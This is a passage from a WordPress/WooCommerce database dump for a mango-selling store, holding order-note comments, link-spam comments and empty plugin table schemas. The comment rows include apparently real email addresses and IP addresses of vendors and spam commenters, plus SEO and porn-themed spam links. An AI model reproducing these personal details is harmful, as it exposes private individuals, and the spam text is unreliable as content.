07:34:50','Razorpay OrderId: order_J47P5lmfAspXtT',0,'1','WooCommerce','order_note',0,0),(94,1200,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 13:05:02','2022-03-07 07:35:02','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(95,1200,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 13:05:06','2022-03-07 07:35:06','Razorpay payment successful <br/>Razorpay Id: pay_J47PCDHbH8uSm5',0,'1','WooCommerce','order_note',0,0),(96,1201,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 15:04:34','2022-03-07 09:34:34','Item testmango (#1194) was Pre-Ordered',0,'1','WooCommerce','order_note',0,0),(97,1201,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 15:04:37','2022-03-07 09:34:37','Razorpay OrderId: order_J49Rcda3Qg9Wig',0,'1','WooCommerce','order_note',0,0),(98,1201,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 15:04:53','2022-03-07 09:34:53','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(99,1201,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 15:04:58','2022-03-07 09:34:58','Razorpay payment successful <br/>Razorpay Id: pay_J49Rn46vEzO65k',0,'1','WooCommerce','order_note',0,0),(100,1202,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 15:45:25','2022-03-07 10:15:25','Item testmango (#1194) was Pre-Ordered',0,'1','WooCommerce','order_note',0,0),(101,1202,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-07 15:45:28','2022-03-07 10:15:28','Razorpay OrderId: order_J4A8m8uOzKect5',0,'1','WooCommerce','order_note',0,0),(102,1202,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-08 17:02:06','2022-03-08 11:32:06','Razorpay OrderId: order_J4Zyqg3dikNXgU',0,'1','WooCommerce','order_note',0,0),(103,1277,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:14:41','2022-03-15 07:44:41','Razorpay OrderId: order_J7HqRUQCD5dCAQ',0,'1','WooCommerce','order_note',0,0),(104,1277,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:17:02','2022-03-15 07:47:02','Transaction Failed: Customer cancelled the payment<br/>',0,'1','WooCommerce','order_note',0,0),(105,1277,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:17:02','2022-03-15 07:47:02','Order status changed from Pending payment to Failed.',0,'1','WooCommerce','order_note',0,0),(106,1277,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:17:05','2022-03-15 07:47:05','Transaction Failed: Customer cancelled the payment<br/>',0,'1','WooCommerce','order_note',0,0),(107,1277,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:17:36','2022-03-15 07:47:36','Transaction Failed: Customer cancelled the payment<br/>',0,'1','WooCommerce','order_note',0,0),(108,1277,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:17:55','2022-03-15 07:47:55','Payment to be made upon delivery. Order status changed from Failed to Processing.',0,'1','WooCommerce','order_note',0,0),(109,1277,'utftech','utftech9@gmail.com','','','2022-03-15 13:19:21','2022-03-15 07:49:21','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/mango/\">mango</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/utftech/\">utftech</a></b>',0,'1','WooCommerce','order_note',0,28),(110,1277,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:19:27','2022-03-15 07:49:27','Order status changed from Processing to Completed.',0,'1','WooCommerce','order_note',0,0),(111,1277,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:19:27','2022-03-15 07:49:27','<b>#1277</b> order status updated to <b>Completed</b>',0,'1','WooCommerce','order_note',0,0),(112,1278,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:20:57','2022-03-15 07:50:57','Item Alphonso mango 3kg (#1194) was Pre-Ordered',0,'1','WooCommerce','order_note',0,0),(113,1278,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:20:57','2022-03-15 07:50:57','Payment to be made upon delivery. Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(114,1278,'xyz','xyzabc9980@gmail.com','','','2022-03-15 13:22:55','2022-03-15 07:52:55','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/testmango/\">Alphonso mango 3kg</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/xyz/\">xyz</a></b>',0,'1','WooCommerce','order_note',0,25),(115,1279,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:28:20','2022-03-15 07:58:20','Item Alphonso mango 3kg (#1194) was Pre-Ordered',0,'1','WooCommerce','order_note',0,0),(116,1279,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:28:20','2022-03-15 07:58:20','Payment to be made upon delivery. Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(117,1279,'xyz','xyzabc9980@gmail.com','','','2022-03-15 13:29:06','2022-03-15 07:59:06','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/testmango/\">Alphonso mango 3kg</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/xyz/\">xyz</a></b>',0,'1','WooCommerce','order_note',0,25),(118,1279,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:29:12','2022-03-15 07:59:12','Order status changed from Processing to Completed.',0,'1','WooCommerce','order_note',0,0),(119,1279,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:29:12','2022-03-15 07:59:12','<b>#1279</b> order status updated to <b>Completed</b>',0,'1','WooCommerce','order_note',0,0),(120,1280,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:32:38','2022-03-15 08:02:38','Item Alphonso mango 3kg (#1194) was Pre-Ordered',0,'1','WooCommerce','order_note',0,0),(121,1280,'WooCommerce','woocommerce@mangomitra.in','','','2022-03-15 13:32:39','2022-03-15 08:02:39','Payment to be made upon delivery. Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(122,1201,'MainStore','bhavani@utfindia.in','','','2022-03-17 15:26:05','2022-03-17 09:56:05','Order item <b><a target=\"_blank\" class=\"wcfm_dashboard_item_title\" href=\"https://mangomitra.in/product/mango-solapur-pickle/\">Mango Solapur Pickle</a></b> status updated to <b>Completed</b> by <b><a class=\"wcfm_dashboard_item_title\" target=\"_blank\" href=\"https://mangomitra.in/store/mainstore/\">MainStore</a></b>',0,'1','WooCommerce','order_note',0,21),(123,1202,'WooCommerce','woocommerce@gopalak.in','','','2022-10-11 03:27:58','2022-10-10 21:57:58','Unpaid order cancelled - time limit reached. Order status changed from Pending payment to Cancelled.',0,'1','WooCommerce','order_note',0,0),(124,1988,'WooCommerce','woocommerce@gopalak.in','','','2022-10-27 17:35:31','2022-10-27 12:05:31','Razorpay OrderId: order_KYn1MaewPALri1',0,'1','WooCommerce','order_note',0,0),(125,1988,'WooCommerce','woocommerce@gopalak.in','','','2022-10-27 17:54:18','2022-10-27 12:24:18','Payment to be made upon delivery. Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(126,1989,'WooCommerce','woocommerce@gopalak.in','','','2022-10-28 09:38:22','2022-10-28 04:08:22','Razorpay OrderId: order_KZ3QQbxeiQFP7i',0,'1','WooCommerce','order_note',0,0),(127,1989,'WooCommerce','woocommerce@gopalak.in','','','2022-10-28 09:39:27','2022-10-28 04:09:27','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(128,1989,'WooCommerce','woocommerce@gopalak.in','','','2022-10-28 09:39:30','2022-10-28 04:09:30','Razorpay payment successful <br/>Razorpay Id: pay_KZ3RVX7gDlmP90',0,'1','WooCommerce','order_note',0,0),(129,2032,'WooCommerce','woocommerce@gopalak.in','','','2022-11-22 12:24:44','2022-11-22 06:54:44','Razorpay OrderId: order_KizcDLC2Jeg5X1',0,'1','WooCommerce','order_note',0,0),(130,2032,'WooCommerce','woocommerce@gopalak.in','','','2022-11-22 12:25:11','2022-11-22 06:55:11','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(131,2032,'WooCommerce','woocommerce@gopalak.in','','','2022-11-22 12:25:13','2022-11-22 06:55:13','Razorpay payment successful <br/>Razorpay Id: pay_KizcRN96n0nX9j',0,'1','WooCommerce','order_note',0,0),(132,480,'mebel-Largo.ru','glenhutchinson@gmail.com','https://mebel-largo.ru/user/fuelview1/','193.218.190.29','2023-07-10 23:55:53','2023-07-10 18:25:53','%%\r\n\r\nMy web site best seo in london (<a href=\"https://mebel-largo.ru/user/fuelview1/\" rel=\"nofollow ugc\">mebel-Largo.ru</a>)',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(133,480,'Marcelino','barneymacdermott@yahoo.com','http://rlu.ru/3nMbi','193.150.70.239','2023-07-28 09:46:39','2023-07-28 04:16:39','%%\r\n\r\nFeel free to surf to my website - best london seo agency (<a href=\"http://rlu.ru/3nMbi\" rel=\"nofollow ugc\">Marcelino</a>)',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(134,480,'Patti','rosieleslie@msn.com','http://n0.ntos.kr/bbs/board.php?bo_table=free&amp;wr_id=5568640','193.150.70.74','2023-07-31 03:19:58','2023-07-30 21:49:58','%%\r\n\r\nMy web page :: london seo expert (<a href=\"http://n0.ntos.kr/bbs/board.php?bo_table=free&amp;wr_id=5568640\" rel=\"nofollow ugc\">Patti</a>)',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(135,480,'optimization','wilfredoaylward@uol.com.br','http://clients1.google.ge/url?q=https%3A%2F%2Fsickseo.co.uk/','193.218.190.18','2023-08-07 06:10:19','2023-08-07 00:40:19','%%\r\n\r\nHere is my web page - <a href=\"http://clients1.google.ge/url?q=https%3A%2F%2Fsickseo.co.uk/\" rel=\"nofollow ugc\">optimization</a>',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(136,480,'Matthew','shannanbeckman@yahoo.com','https://telegra.ph/14-Smart-Ways-To-Spend-Your-On-Leftover-SEO-Consultant-London-Budget-03-21','193.150.70.30','2023-08-11 15:33:40','2023-08-11 10:03:40','%%\r\n\r\nHere is my site: freelance seo consultant london (<a href=\"https://telegra.ph/14-Smart-Ways-To-Spend-Your-On-Leftover-SEO-Consultant-London-Budget-03-21\" rel=\"nofollow ugc\">Matthew</a>)',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(137,480,'Car Accident Injury Attorneys','ceryswertheim@laposte.net','https://www.papaflower.co.kr/bbs/board.php?bo_table=free&amp;wr_id=768563','193.150.70.178','2023-08-26 17:52:44','2023-08-26 12:22:44','<a href=\"https://www.papaflower.co.kr/bbs/board.php?bo_table=free&amp;wr_id=768563\" rel=\"nofollow ugc\">Car Accident Injury Attorneys</a>',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(138,480,'Josie','elizabeth_hawken@gmail.com','https://spechrom.com:443/bbs/board.php?bo_table=service&amp;wr_id=527','5.45.37.255','2023-12-09 08:28:02','2023-12-09 02:58:02','%%\r\n\r\nMy website; best seo consultant affordable (<a href=\"https://spechrom.com:443/bbs/board.php?bo_table=service&amp;wr_id=527\" rel=\"nofollow ugc\">Josie</a>)',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(139,480,'kayleigh Wanles Naked','estela_tiegs@rambler.ru','http://www.dungdong.com/home.php?mod=space&amp;uid=2864058&amp;do=profile','5.45.37.38','2024-01-12 01:37:29','2024-01-11 20:07:29','The Ultimate Glossary Of Terms For Pornstars With Onlyfans <a href=\"http://www.dungdong.com/home.php?mod=space&amp;uid=2864058&amp;do=profile\" rel=\"nofollow ugc\">kayleigh Wanles Naked</a>',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(140,480,'accident attorneys near me','madie.fierro@gmail.com','https://mozillabd.science/wiki/User:MarkoGrantham81','102.165.1.150','2024-01-21 00:37:01','2024-01-20 19:07:01','8 Tips To Increase Your Best Accident Attorneys Near Me Game <a href=\"https://mozillabd.science/wiki/User:MarkoGrantham81\" rel=\"nofollow ugc\">accident attorneys near me</a>',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(141,480,'Accident Lawyers in nashville','cheryl.ryder@hotmail.es','https://wifidb.science/wiki/User:MichaelaDickey','37.143.62.115','2024-01-28 04:45:50','2024-01-27 23:15:50','5 Killer Qora\'s Answers To Accident Lawyers In Nashville <a href=\"https://wifidb.science/wiki/User:MichaelaDickey\" rel=\"nofollow ugc\">Accident Lawyers in nashville</a>',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(142,480,'british porn stars xxx','monikateresa@hotmail.co.uk','https://tarifkchr.net/user/drythumb50/','102.165.1.119','2024-03-22 14:46:14','2024-03-22 09:16:14','5 UK Pornstar Projects For Every Budget <a href=\"https://tarifkchr.net/user/drythumb50/\" rel=\"nofollow ugc\">british porn stars xxx</a>',0,'0','Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51','comment',0,0),(143,480,'https://Privatehd.org/','dantegabb@alice.it','https://privatehd.org/user/climbgun7/','102.165.1.135','2024-06-01 08:53:03','2024-06-01 03:23:03','The 9 Things Your Parents Teach You About Top British Pornstars \r\ntop british pornstars (<a href=\"https://privatehd.org/user/climbgun7/\" rel=\"nofollow ugc\">https://Privatehd.org/</a>)',0,'0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36','comment',0,0),(144,256,'sneeriest','m1XSvgr7WC@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-20 20:20:38','2025-02-20 14:50:38','tZD7eWj06yX',0,'0','TheSafeInternetSearch','comment',0,0),(145,256,'demandingness','pLBn904FSB@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-20 21:55:26','2025-02-20 16:25:26','BiBT6vY60gp',0,'0','TheSafeInternetSearch','comment',0,0),(146,1,'whining','3sgQEV7FLG@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-20 23:09:21','2025-02-20 17:39:21','MdRRllyN9IB',0,'0','TheSafeInternetSearch','comment',0,0),(147,1,'eversible','sibx2ml2fw@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 00:16:34','2025-02-20 18:46:34','dbEa7suSLmy',0,'0','TheSafeInternetSearch','comment',0,0),(148,252,'genies','u99eJmP3Xg@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 05:05:27','2025-02-20 23:35:27','K0UhDWs4yOu',0,'0','TheSafeInternetSearch','comment',0,0),(149,252,'servilism','rk4Tizleam@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 06:49:35','2025-02-21 01:19:35','ExAEIrXndp5',0,'0','TheSafeInternetSearch','comment',0,0),(150,732,'Leo DiCaprio','fSDBBzl8g1@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 11:25:20','2025-02-21 05:55:20','HWyHhnYS1oZ',0,'0','TheSafeInternetSearch','comment',0,0),(151,718,'mollified','x7c6yn0wfE@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 13:48:31','2025-02-21 08:18:31','gTFYFKxpana',0,'0','TheSafeInternetSearch','comment',0,0),(152,252,'linocut','K95dbLFmU2@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 14:25:49','2025-02-21 08:55:49','osQoUoSM10e',0,'0','TheSafeInternetSearch','comment',0,0),(153,1,'cholis','zuiy3gpflI@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 16:14:50','2025-02-21 10:44:50','RJIY7JtZZR7',0,'0','TheSafeInternetSearch','comment',0,0),(154,1,'deathier','2EbWXTxNPy@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 16:41:34','2025-02-21 11:11:34','DRuv5PGZkeq',0,'0','TheSafeInternetSearch','comment',0,0),(155,718,'sweater puppies','MefjnpVdZ1@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 17:41:25','2025-02-21 12:11:25','ZsZpb8IVwqn',0,'0','TheSafeInternetSearch','comment',0,0),(156,732,'eidograph','npUmqzKl6q@hotmail.com','https://newwavefoods.com/','179.43.191.19','2025-02-21 17:55:11','2025-02-21 12:25:11','piUojWNeJs7',0,'0','TheSafeInternetSearch','comment',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_e_events`
--

DROP TABLE IF EXISTS `wp_e_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_e_events` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `event_data` text DEFAULT NULL,
  `created_at` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `created_at_index` (`created_at`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_e_events`
--

LOCK TABLES `wp_e_events` WRITE;
/*!40000 ALTER TABLE `wp_e_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_e_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_fca_cc_activity_tbl`
--

DROP TABLE IF EXISTS `wp_fca_cc_activity_tbl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_fca_cc_activity_tbl` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `contest` bigint(20) DEFAULT NULL,
  `name` varchar(100) DEFAULT NULL,
  `email` varchar(100) DEFAULT NULL,
  `time` datetime DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  `status` varchar(20) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_fca_cc_activity_tbl`
--

LOCK TABLES `wp_fca_cc_activity_tbl` WRITE;
/*!40000 ALTER TABLE `wp_fca_cc_activity_tbl` DISABLE KEYS */;
INSERT INTO `wp_fca_cc_activity_tbl` VALUES (1,787,'','aaa@gmail.com','2022-02-08 13:01:00','122.167.80.119','rejected');
/*!40000 ALTER TABLE `wp_fca_cc_activity_tbl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_entry`
--

DROP TABLE IF EXISTS `wp_frmt_form_entry`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_frmt_form_entry` (
  `entry_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_type` varchar(191) NOT NULL,
  `draft_id` varchar(12) DEFAULT NULL,
  `form_id` bigint(20) unsigned NOT NULL,
  `is_spam` tinyint(1) NOT NULL DEFAULT 0,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`entry_id`),
  KEY `entry_is_spam` (`is_spam`),
  KEY `entry_type` (`entry_type`),
  KEY `entry_form_id` (`form_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_entry`
--

LOCK TABLES `wp_frmt_form_entry` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_entry` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_entry` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_entry_meta`
--

DROP TABLE IF EXISTS `wp_frmt_form_entry_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_frmt_form_entry_meta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(191) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`),
  KEY `meta_entry_id` (`entry_id`),
  KEY `meta_key_object` (`entry_id`,`meta_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_entry_meta`
--

LOCK TABLES `wp_frmt_form_entry_meta` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_entry_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_entry_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_reports`
--

DROP TABLE IF EXISTS `wp_frmt_form_reports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_frmt_form_reports` (
  `report_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `report_value` longtext NOT NULL,
  `status` varchar(200) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`report_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_reports`
--

LOCK TABLES `wp_frmt_form_reports` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_reports` DISABLE KEYS */;
INSERT INTO `wp_frmt_form_reports` VALUES (1,'a:5:{s:7:\"exclude\";a:1:{i:0;i:1;}s:8:\"settings\";a:3:{s:5:\"label\";s:12:\"Form reports\";s:6:\"module\";s:5:\"forms\";s:10:\"forms_type\";s:3:\"all\";}s:8:\"schedule\";a:3:{s:9:\"frequency\";s:7:\"monthly\";s:8:\"monthDay\";s:1:\"4\";s:9:\"monthTime\";s:8:\"04:00 AM\";}s:13:\"report_status\";s:8:\"inactive\";s:10:\"recipients\";a:1:{i:0;a:5:{s:2:\"id\";i:0;s:4:\"name\";b:0;s:5:\"email\";b:0;s:4:\"role\";N;s:6:\"avatar\";s:49:\"https://secure.gravatar.com/avatar/?s=96&d=mm&r=g\";}}}','inactive','2022-11-18 04:26:41','2022-11-18 04:26:41');
/*!40000 ALTER TABLE `wp_frmt_form_reports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_frmt_form_views`
--

DROP TABLE IF EXISTS `wp_frmt_form_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_frmt_form_views` (
  `view_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) unsigned NOT NULL,
  `page_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(191) DEFAULT NULL,
  `count` mediumint(8) unsigned NOT NULL DEFAULT 1,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`view_id`),
  KEY `view_form_id` (`form_id`),
  KEY `view_ip` (`ip`),
  KEY `view_form_object` (`form_id`,`view_id`),
  KEY `view_form_object_ip` (`form_id`,`view_id`,`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_frmt_form_views`
--

LOCK TABLES `wp_frmt_form_views` WRITE;
/*!40000 ALTER TABLE `wp_frmt_form_views` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_frmt_form_views` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_commentmeta`
--

DROP TABLE IF EXISTS `wp_give_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_commentmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `give_comment_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `give_comment_id` (`give_comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_commentmeta`
--

LOCK TABLES `wp_give_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_give_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_comments`
--

DROP TABLE IF EXISTS `wp_give_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_comments` (
  `comment_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `comment_content` longtext NOT NULL,
  `comment_parent` mediumtext NOT NULL,
  `comment_type` mediumtext NOT NULL,
  `comment_date` datetime NOT NULL,
  `comment_date_gmt` datetime NOT NULL,
  PRIMARY KEY (`comment_ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_comments`
--

LOCK TABLES `wp_give_comments` WRITE;
/*!40000 ALTER TABLE `wp_give_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_donationmeta`
--

DROP TABLE IF EXISTS `wp_give_donationmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_donationmeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `donation_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `donation_id` (`donation_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_donationmeta`
--

LOCK TABLES `wp_give_donationmeta` WRITE;
/*!40000 ALTER TABLE `wp_give_donationmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_donationmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_donormeta`
--

DROP TABLE IF EXISTS `wp_give_donormeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_give_donormeta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `donor_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `donor_id` (`donor_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_give_donormeta`
--

LOCK TABLES `wp_give_donormeta` WRITE;
/*!40000 ALTER TABLE `wp_give_donormeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_give_donormeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_give_donors`
--

DROP TABLE IF EXISTS `wp_give_donors`;
